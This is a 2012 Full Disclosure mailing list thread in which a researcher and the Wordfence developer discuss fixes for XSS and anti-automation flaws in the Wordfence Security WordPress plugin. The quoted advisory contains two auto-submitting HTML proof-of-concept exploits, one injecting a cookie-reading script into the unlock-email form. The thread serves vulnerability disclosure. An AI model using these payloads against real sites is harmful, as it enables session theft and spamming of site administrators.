Full Disclosure mailing list archives
Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress
From: "MustLive" <mustlive () websecurity com ua>
Date: Sat, 27 Oct 2012 01:57:48 +0300
Hi Mark! You are welcome. As I see, you've reacted on post to Full-disclosure even faster then on my letter to you (which I've sent you before disclosing to security mailing lists). It is example of the power of Full-disclosure ;-). It's good that you've quickly fixed these holes. But I'm not agree with the way you've fixed IAA vulnerability (at that XSS is fixed correctly, as I've checked). You've wrote in the changelog that you added rate limiting to max of 10 requests per second to the unlock form. But it doesn't protect from spamming. As I've wrote in comment to IAA vulnerability in advisory at my site: "There is no protection (captcha) against automated picking up of admin's e-mail. And if to know admin's e-mail, then by this way it'll be possible to spam him by letters from the site".
From it you can see, that your fix can't protect from this attack (as
captcha could). By sending 10 requests per second with correct e-mail, it'll be possible to overspam admin's e-mail account (so the plugin is still vulnerable to IAA and you need to better fix it). Also there are other vulnerabilities in Wordfence and all of these vulnerabilities concern your web site too. Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua ----- Original Message ----- From: Mark Maunder To: MustLive Cc: submissions () packetstormsecurity org ; full-disclosure () lists grok org uk Sent: Friday, October 19, 2012 9:09 PM Subject: Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress This has been fixed and the release just went out. Version 3.3.7. The email param is now escaped and we've added rate limiting to the form with a 3 minute backoff if the limit is exceeded. http://wordpress.org/extend/plugins/wordfence/changelog/ Thanks for your report. Regards, Mark Maunder. On Fri, Oct 19, 2012 at 7:16 PM, MustLive <mustlive () websecurity com ua> wrote: Hello list! I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for WordPress. Wordfence - it's security plugin for WordPress. ------------------------- Affected products: ------------------------- Vulnerable are Wordfence Security 3.3.5 and previous versions. ---------- Details: ---------- XSS (WASC-08): Wordfence Security XSS.html <html> <head> <title>Wordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post"> <input type="hidden" name="email" value="<script>alert(document.cookie)</script>"> </form> </body> </html> Insufficient Anti-automation (WASC-21): Wordfence Security IAA.html <html> <head> <title>Wordfence Security IAA exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post"> <input type="hidden" name="email" value="admin () e-mail com"> </form> </body> </html> I've informed the plugin developer about vulnerabilities. And mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6106/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua -- Mark Maunder <mmaunder () gmail com> France: (+33) 068-700-8029 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XSS and IAA vulnerabilities in Wordfence Security for WordPress MustLive (Oct 19)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Philip Whitehouse (Oct 21)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Troy Rose (Oct 24)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Mark Maunder (Oct 21)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress MustLive (Oct 26)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Philip Whitehouse (Oct 21)